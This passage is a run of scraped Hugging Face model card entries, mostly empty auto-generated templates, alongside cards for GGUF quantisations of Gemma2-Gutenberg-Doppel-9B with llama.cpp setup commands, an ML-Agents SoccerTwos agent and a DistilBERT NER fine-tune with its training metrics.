### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
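In the absence of an official snippet, a minimal sketch based on this repo's `wav2vec2` / automatic-speech-recognition tags is shown below; the audio path is a placeholder and the exact output format depends on how the processor was configured:

```python
from transformers import pipeline

# Load the checkpoint with the standard ASR pipeline (assumes a CTC-style Wav2Vec2 head).
asr = pipeline("automatic-speech-recognition", model="davidbae/ipa-asr")

# "sample.wav" is a placeholder path to a 16 kHz mono audio file.
result = asr("sample.wav")
print(result["text"])  # expected to be an IPA transcription, per the model name
```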
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
Trelis/Llama-3.2-1B-Instruct-MATH-20241010-125040 | Trelis | 2024-10-10T12:55:11Z | 126 | 0 | transformers | [
"transformers",
"safetensors",
"llama",
"text-generation",
"trl",
"sft",
"conversational",
"arxiv:1910.09700",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2024-10-10T12:54:01Z | ---
library_name: transformers
tags:
- trl
- sft
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
iarchitarora/gemma2-Code-Instruct-Finetune-test | iarchitarora | 2024-10-10T12:47:26Z | 127 | 0 | transformers | [
"transformers",
"safetensors",
"gemma",
"text-generation",
"arxiv:1910.09700",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2024-10-10T12:42:48Z | ---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
Juu24/poca-SoccerTwos | Juu24 | 2024-10-10T12:46:25Z | 35 | 0 | ml-agents | [
"ml-agents",
"tensorboard",
"onnx",
"SoccerTwos",
"deep-reinforcement-learning",
"reinforcement-learning",
"ML-Agents-SoccerTwos",
"region:us"
] | reinforcement-learning | 2024-10-10T12:45:16Z | ---
library_name: ml-agents
tags:
- SoccerTwos
- deep-reinforcement-learning
- reinforcement-learning
- ML-Agents-SoccerTwos
---
# **poca** Agent playing **SoccerTwos**
This is a trained model of a **poca** agent playing **SoccerTwos**
using the [Unity ML-Agents Library](https://github.com/Unity-Technologies/ml-agents).
## Usage (with ML-Agents)
The Documentation: https://unity-technologies.github.io/ml-agents/ML-Agents-Toolkit-Documentation/
We wrote a complete tutorial to learn to train your first agent using ML-Agents and publish it to the Hub:
- A *short tutorial* where you teach Huggy the Dog 🐶 to fetch the stick and then play with him directly in your
browser: https://huggingface.co/learn/deep-rl-course/unitbonus1/introduction
- A *longer tutorial* to understand how ML-Agents works:
https://huggingface.co/learn/deep-rl-course/unit5/introduction
### Resume the training
```bash
mlagents-learn <your_configuration_file_path.yaml> --run-id=<run_id> --resume
```
### Watch your Agent play
You can watch your agent **playing directly in your browser**:
1. If the environment is part of ML-Agents official environments, go to https://huggingface.co/unity
2. Find your model_id: Juu24/poca-SoccerTwos
3. Select your *.nn /*.onnx file
4. Click on Watch the agent play 👀
|
nqzfaizal77ai/nqzora-twyla-geminox-init-510m | nqzfaizal77ai | 2024-10-10T12:45:41Z | 92 | 0 | transformers | [
"transformers",
"safetensors",
"gemma2",
"text-generation",
"base_model:google/gemma-2-2b",
"base_model:finetune:google/gemma-2-2b",
"license:gemma",
"autotrain_compatible",
"text-generation-inference",
"region:us"
] | text-generation | 2024-10-08T11:44:50Z | ---
library_name: transformers
inference: false
license: gemma
base_model:
- google/gemma-2-2b
---
A pruned google/gemma-2-2b model, renamed as an init model under a new name to avoid trademark infringement.
<img src="nqzora-twyla-geminox-cover.webp" alt="NQZora Twyla Geminox" style="width: 200px; height: 200px; margin-right:auto; margin-left:auto;">
Note: Image created with [Flux 1 schnell](https://huggingface.co/spaces/black-forest-labs/FLUX.1-schnell)
# New Quantum Zone Technology Model
NQZora Twyla Geminox
- Twyla: a name that means "twilight" or "dual", implying a balance between two opposing forces.
- Geminox: a combination of "Gemini" (representing duality and adaptability) and "nox" (Latin for night). It could reflect adaptability in learning and a dual nature, knowledge in various forms. The name retains the concept of duality and adaptability, but with a more mysterious and intriguing tone, and could symbolize the balance between old and new knowledge, or the interplay between different learning styles.
- NQZora: combining "NQZ" with "zora" (meaning "dawn" in Slavic languages), symbolizing a new beginning.
Triangle104/Gemma2-Gutenberg-Doppel-9B-Q5_K_M-GGUF | Triangle104 | 2024-10-10T12:36:47Z | 13 | 0 | transformers | [
"transformers",
"gguf",
"llama-cpp",
"gguf-my-repo",
"dataset:jondurbin/gutenberg-dpo-v0.1",
"dataset:nbeerbower/gutenberg2-dpo",
"base_model:nbeerbower/Gemma2-Gutenberg-Doppel-9B",
"base_model:quantized:nbeerbower/Gemma2-Gutenberg-Doppel-9B",
"license:gemma",
"model-index",
"endpoints_compatible",
"region:us",
"conversational"
] | null | 2024-10-10T12:33:46Z | ---
base_model: nbeerbower/Gemma2-Gutenberg-Doppel-9B
datasets:
- jondurbin/gutenberg-dpo-v0.1
- nbeerbower/gutenberg2-dpo
library_name: transformers
license: gemma
tags:
- llama-cpp
- gguf-my-repo
model-index:
- name: Gemma2-Gutenberg-Doppel-9B
results:
- task:
type: text-generation
name: Text Generation
dataset:
name: IFEval (0-Shot)
type: HuggingFaceH4/ifeval
args:
num_few_shot: 0
metrics:
- type: inst_level_strict_acc and prompt_level_strict_acc
value: 71.71
name: strict accuracy
source:
url: https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard?query=nbeerbower/Gemma2-Gutenberg-Doppel-9B
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: BBH (3-Shot)
type: BBH
args:
num_few_shot: 3
metrics:
- type: acc_norm
value: 41.08
name: normalized accuracy
source:
url: https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard?query=nbeerbower/Gemma2-Gutenberg-Doppel-9B
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: MATH Lvl 5 (4-Shot)
type: hendrycks/competition_math
args:
num_few_shot: 4
metrics:
- type: exact_match
value: 3.47
name: exact match
source:
url: https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard?query=nbeerbower/Gemma2-Gutenberg-Doppel-9B
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: GPQA (0-shot)
type: Idavidrein/gpqa
args:
num_few_shot: 0
metrics:
- type: acc_norm
value: 10.63
name: acc_norm
source:
url: https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard?query=nbeerbower/Gemma2-Gutenberg-Doppel-9B
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: MuSR (0-shot)
type: TAUR-Lab/MuSR
args:
num_few_shot: 0
metrics:
- type: acc_norm
value: 17.3
name: acc_norm
source:
url: https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard?query=nbeerbower/Gemma2-Gutenberg-Doppel-9B
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: MMLU-PRO (5-shot)
type: TIGER-Lab/MMLU-Pro
config: main
split: test
args:
num_few_shot: 5
metrics:
- type: acc
value: 34.75
name: accuracy
source:
url: https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard?query=nbeerbower/Gemma2-Gutenberg-Doppel-9B
name: Open LLM Leaderboard
---
# Triangle104/Gemma2-Gutenberg-Doppel-9B-Q5_K_M-GGUF
This model was converted to GGUF format from [`nbeerbower/Gemma2-Gutenberg-Doppel-9B`](https://huggingface.co/nbeerbower/Gemma2-Gutenberg-Doppel-9B) using llama.cpp via ggml.ai's [GGUF-my-repo](https://huggingface.co/spaces/ggml-org/gguf-my-repo) space.
Refer to the [original model card](https://huggingface.co/nbeerbower/Gemma2-Gutenberg-Doppel-9B) for more details on the model.
---
Model details:
-
Gemma2-Gutenberg-Doppel-9B
UCLA-AGI/Gemma-2-9B-It-SPPO-Iter3 finetuned on jondurbin/gutenberg-dpo-v0.1 and nbeerbower/gutenberg2-dpo.
Method
ORPO finetuned using 2x A40 for 3 epochs.
Open LLM Leaderboard Evaluation Results
Detailed results can be found here
| Metric | Value |
|--------|------:|
| Avg. | 29.82 |
| IFEval (0-Shot) | 71.71 |
| BBH (3-Shot) | 41.08 |
| MATH Lvl 5 (4-Shot) | 3.47 |
| GPQA (0-shot) | 10.63 |
| MuSR (0-shot) | 17.30 |
| MMLU-PRO (5-shot) | 34.75 |
---
## Use with llama.cpp
Install llama.cpp through brew (works on Mac and Linux)
```bash
brew install llama.cpp
```
Invoke the llama.cpp server or the CLI.
### CLI:
```bash
llama-cli --hf-repo Triangle104/Gemma2-Gutenberg-Doppel-9B-Q5_K_M-GGUF --hf-file gemma2-gutenberg-doppel-9b-q5_k_m.gguf -p "The meaning to life and the universe is"
```
### Server:
```bash
llama-server --hf-repo Triangle104/Gemma2-Gutenberg-Doppel-9B-Q5_K_M-GGUF --hf-file gemma2-gutenberg-doppel-9b-q5_k_m.gguf -c 2048
```
Note: You can also use this checkpoint directly through the [usage steps](https://github.com/ggerganov/llama.cpp?tab=readme-ov-file#usage) listed in the Llama.cpp repo as well.
Step 1: Clone llama.cpp from GitHub.
```
git clone https://github.com/ggerganov/llama.cpp
```
Step 2: Move into the llama.cpp folder and build it with `LLAMA_CURL=1` flag along with other hardware-specific flags (for ex: LLAMA_CUDA=1 for Nvidia GPUs on Linux).
```
cd llama.cpp && LLAMA_CURL=1 make
```
Step 3: Run inference through the main binary.
```
./llama-cli --hf-repo Triangle104/Gemma2-Gutenberg-Doppel-9B-Q5_K_M-GGUF --hf-file gemma2-gutenberg-doppel-9b-q5_k_m.gguf -p "The meaning to life and the universe is"
```
or
```
./llama-server --hf-repo Triangle104/Gemma2-Gutenberg-Doppel-9B-Q5_K_M-GGUF --hf-file gemma2-gutenberg-doppel-9b-q5_k_m.gguf -c 2048
```
|
roncmic/distilbert-base-uncased-finetuned-ner | roncmic | 2024-10-10T12:35:52Z | 127 | 0 | transformers | [
"transformers",
"safetensors",
"distilbert",
"token-classification",
"generated_from_trainer",
"dataset:conll2003",
"base_model:distilbert/distilbert-base-uncased",
"base_model:finetune:distilbert/distilbert-base-uncased",
"license:apache-2.0",
"model-index",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | token-classification | 2024-10-10T12:31:20Z | ---
library_name: transformers
license: apache-2.0
base_model: distilbert-base-uncased
tags:
- generated_from_trainer
datasets:
- conll2003
metrics:
- precision
- recall
- f1
- accuracy
model-index:
- name: distilbert-base-uncased-finetuned-ner
results:
- task:
name: Token Classification
type: token-classification
dataset:
name: conll2003
type: conll2003
config: conll2003
split: validation
args: conll2003
metrics:
- name: Precision
type: precision
value: 0.9258481600176816
- name: Recall
type: recall
value: 0.9372413021590782
- name: F1
type: f1
value: 0.9315098954858795
- name: Accuracy
type: accuracy
value: 0.983668800737128
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# distilbert-base-uncased-finetuned-ner
This model is a fine-tuned version of [distilbert-base-uncased](https://huggingface.co/distilbert-base-uncased) on the conll2003 dataset.
It achieves the following results on the evaluation set:
- Loss: 0.0606
- Precision: 0.9258
- Recall: 0.9372
- F1: 0.9315
- Accuracy: 0.9837
## Model description
More information needed
## Intended uses & limitations
More information needed
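As a starting point, the checkpoint can be tried with the standard token-classification pipeline. This is a sketch rather than an official example; the `aggregation_strategy` choice and the sample sentence are assumptions:

```python
from transformers import pipeline

# NER pipeline over the fine-tuned checkpoint; "simple" merges word pieces into entity spans.
ner = pipeline(
    "token-classification",
    model="roncmic/distilbert-base-uncased-finetuned-ner",
    aggregation_strategy="simple",
)

print(ner("Hugging Face is based in New York City."))
# Expected: PER/ORG/LOC/MISC spans, following the CoNLL-2003 label set used for fine-tuning.
```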
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 2e-05
- train_batch_size: 16
- eval_batch_size: 16
- seed: 42
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- num_epochs: 3
### Training results
| Training Loss | Epoch | Step | Validation Loss | Precision | Recall | F1 | Accuracy |
|:-------------:|:-----:|:----:|:---------------:|:---------:|:------:|:------:|:--------:|
| 0.2412 | 1.0 | 878 | 0.0686 | 0.9041 | 0.9249 | 0.9144 | 0.9803 |
| 0.0519 | 2.0 | 1756 | 0.0596 | 0.9236 | 0.9339 | 0.9287 | 0.9831 |
| 0.0298 | 3.0 | 2634 | 0.0606 | 0.9258 | 0.9372 | 0.9315 | 0.9837 |
### Framework versions
- Transformers 4.45.2
- Pytorch 2.4.1
- Datasets 2.18.0
- Tokenizers 0.20.0
|
Trelis/Llama-3.2-1B-Instruct-touch-rugby-synth-1epochs-20241010-122522-distilled-reverse-0.5alpha | Trelis | 2024-10-10T12:31:05Z | 127 | 0 | transformers | [
"transformers",
"safetensors",
"llama",
"text-generation",
"trl",
"sft",
"conversational",
"arxiv:1910.09700",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2024-10-10T12:29:48Z | ---
library_name: transformers
tags:
- trl
- sft
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
pranavdaware/web_ocr | pranavdaware | 2024-10-10T12:30:14Z | 19 | 0 | null | [
"safetensors",
"GOT",
"image-to-text",
"custom_code",
"hi",
"en",
"base_model:stepfun-ai/GOT-OCR2_0",
"base_model:finetune:stepfun-ai/GOT-OCR2_0",
"license:apache-2.0",
"region:us"
] | image-to-text | 2024-09-30T12:16:34Z |
---
license: apache-2.0
language:
- hi
- en
metrics:
- accuracy
base_model:
- stepfun-ai/GOT-OCR2_0
pipeline_tag: image-to-text
--- |
Triangle104/Gemma2-Gutenberg-Doppel-9B-Q4_K_M-GGUF | Triangle104 | 2024-10-10T12:22:21Z | 19 | 0 | transformers | [
"transformers",
"gguf",
"llama-cpp",
"gguf-my-repo",
"dataset:jondurbin/gutenberg-dpo-v0.1",
"dataset:nbeerbower/gutenberg2-dpo",
"base_model:nbeerbower/Gemma2-Gutenberg-Doppel-9B",
"base_model:quantized:nbeerbower/Gemma2-Gutenberg-Doppel-9B",
"license:gemma",
"model-index",
"endpoints_compatible",
"region:us",
"conversational"
] | null | 2024-10-10T12:20:06Z | ---
base_model: nbeerbower/Gemma2-Gutenberg-Doppel-9B
datasets:
- jondurbin/gutenberg-dpo-v0.1
- nbeerbower/gutenberg2-dpo
library_name: transformers
license: gemma
tags:
- llama-cpp
- gguf-my-repo
model-index:
- name: Gemma2-Gutenberg-Doppel-9B
results:
- task:
type: text-generation
name: Text Generation
dataset:
name: IFEval (0-Shot)
type: HuggingFaceH4/ifeval
args:
num_few_shot: 0
metrics:
- type: inst_level_strict_acc and prompt_level_strict_acc
value: 71.71
name: strict accuracy
source:
url: https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard?query=nbeerbower/Gemma2-Gutenberg-Doppel-9B
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: BBH (3-Shot)
type: BBH
args:
num_few_shot: 3
metrics:
- type: acc_norm
value: 41.08
name: normalized accuracy
source:
url: https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard?query=nbeerbower/Gemma2-Gutenberg-Doppel-9B
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: MATH Lvl 5 (4-Shot)
type: hendrycks/competition_math
args:
num_few_shot: 4
metrics:
- type: exact_match
value: 3.47
name: exact match
source:
url: https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard?query=nbeerbower/Gemma2-Gutenberg-Doppel-9B
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: GPQA (0-shot)
type: Idavidrein/gpqa
args:
num_few_shot: 0
metrics:
- type: acc_norm
value: 10.63
name: acc_norm
source:
url: https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard?query=nbeerbower/Gemma2-Gutenberg-Doppel-9B
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: MuSR (0-shot)
type: TAUR-Lab/MuSR
args:
num_few_shot: 0
metrics:
- type: acc_norm
value: 17.3
name: acc_norm
source:
url: https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard?query=nbeerbower/Gemma2-Gutenberg-Doppel-9B
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: MMLU-PRO (5-shot)
type: TIGER-Lab/MMLU-Pro
config: main
split: test
args:
num_few_shot: 5
metrics:
- type: acc
value: 34.75
name: accuracy
source:
url: https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard?query=nbeerbower/Gemma2-Gutenberg-Doppel-9B
name: Open LLM Leaderboard
---
# Triangle104/Gemma2-Gutenberg-Doppel-9B-Q4_K_M-GGUF
